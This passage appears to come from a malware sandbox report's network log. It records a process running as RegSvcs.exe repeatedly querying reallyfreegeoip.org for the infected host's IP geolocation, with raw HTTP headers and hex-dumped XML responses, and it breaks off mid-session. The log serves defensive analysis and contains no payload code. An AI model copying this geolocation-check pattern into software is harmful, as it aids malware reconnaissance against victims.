2025-01-02 19:23:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:00 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:00 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160629 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAkh1KxKR4kDWkRrJGZRi01zAG%2FA9aTe3c4yd684O0FHaE9ltaRUfKfI9cGJeA1CZJdO48WPt7kgU34Sum3Og4j4Kr1CoI%2BAbYE3Z%2Fd9j%2B4Onn14Pw2eEAaGvLyDfSUGXTGr79ia"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20775ad5c445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1717&rtt_var=824&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1700640&cwnd=227&unsent_bytes=0&cid=a80d77a340b19336&ts=154&x=0"
2025-01-02 19:24:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:01 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160630 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1%2Ftj3cIoyXFXFaJZhT%2FWj8At3lh5TKLEPfYMC2wzr2bzR8k68hdc3C6%2BPxwDn5d3V2Kk8KOdvTQNDEv%2BZjXMsV4pU%2B3d70iDeDn%2BjvM3kyRNZVSAFPnDa%2FM9ejRefU7RNfdF747"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd207eeab732f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2084&min_rtt=2084&rtt_var=782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1397797&cwnd=112&unsent_bytes=0&cid=55d001aec60039ca&ts=242&x=0"
2025-01-02 19:24:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:01 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:24:01 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160631 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvBMB4wqch9pQ4CL4h7%2F7P9TcZM5oqw1icfFViENs0k8f%2BLwzyG%2B1Pc73gKIC8800wTTyX4FU%2FaY5F6DAcBkKzIFcxFhOkjWw3bfjuV40O2ZaMYF66NSgC8o183KvEazJGtcA9O1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd207face7425b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1708&rtt_var=1203&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=737373&cwnd=238&unsent_bytes=0&cid=bf403d17c24e0c65&ts=155&x=0"
2025-01-02 19:24:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:02 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:24:02 UTC	867	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160631 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFgmWwSkgiprCp%2FJLoH35N8jXaaixVsMNjmNANvD2QpEeI7XndTYgKhxDh8fwFpH0zxWx1aBNXwBWq%2Fo8f%2FkcKu9%2BNNBc0bAsMoIknMt%2F%2ByYqd960D6%2FjmxPH%2FP%2F1fMKuBohtDtF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20842998422e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2268&min_rtt=2260&rtt_var=864&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1254834&cwnd=252&unsent_bytes=0&cid=99f25c65979aee64&ts=146&x=0"
2025-01-02 19:24:02 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:03 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:03 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160632 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fmcq1F7KSJcjkhdjS4o9NFIrRQIhvU%2BAQkRdbjJnWwhdx3tmIPurZUzZS9Rp9mGCZc8e%2BCnDivn4XmjoIG6%2FBRnCb278PXHc4Aot0JYqtg8rWaOIvYDwUudeNE0q92sKBjsIHvFY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd2087ce038cc5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1998&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1407907&cwnd=228&unsent_bytes=0&cid=e603bd5fe4635dd0&ts=145&x=0"
2025-01-02 19:24:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:03 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:24:03 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160633 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCFifJiuWplAjKBEKU95FH7iXzs5ZvtlBWvjT%2FtIuQAIiy9UwcYetVgKeOcxTdWM4g8uFR7TjHVXHsJrOUzbko9ycW1NTBZ2jcdFRkv7suYZi8AblAuoFAk4X8O78vBwUTg6w08A"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd208c9b080f9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1565&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1865814&cwnd=217&unsent_bytes=0&cid=3bb84941faf048db&ts=160&x=0"
2025-01-02 19:24:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:04 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:04 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:04 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160633 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2GhWyMyCVn1UgWQcAwFV9q1CBDSXk0Hvf5xePEVgQJZ84JV%2FWggec9sM2G6ih0OcozYodz0%2B8hrKr3P7lqf0hEkY3tThxrKz0utWE%2FYlVmDPya8Z3GXc9ui58hm4txZsKKmCRlo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd20901e77423f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1715&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1615044&cwnd=237&unsent_bytes=0&cid=08e4d58cd27383ae&ts=164&x=0"
2025-01-02 19:24:04 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:05 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:24:05 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160634 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydwI4fECJrzK%2FJM8onVwnnNskMX8myJCnbDLD2sVvlsh3lwhlhMDEduWUCHBTJm4MvDj7mWo%2FO23hRvmZxLqoKO0nL3NPK7VDQFOAAHUcnqIcayHb4DUT7pXcTPJ4S9TyAgwztKY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd2094f9398c83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1889&rtt_var=738&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1453459&cwnd=189&unsent_bytes=0&cid=6a78dce956ca6fc6&ts=164&x=0"
2025-01-02 19:24:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	188.114.96.3	443	2120	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:24:05 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:24:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160634 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gzu1D9Uq6dGel7irSPXZOUynV4CK5DsPVQM6fTKlJIaYYQPBG9plsX2wccH%2F58MAI9PIGGPFYoMWXHBoo1dQKn5YnQLimlOImUrv6w4Rjx7BXSJuaJCRAuRBIDLoCPssxHf0xW%2Fs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd209879270f9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1482&rtt_var=585&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1825000&cwnd=217&unsent_bytes=0&cid=0e984cb7d5287767&ts=136&x=0"
2025-01-02 19:24:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49761	188.114.96.3	443	7380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:24:06 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
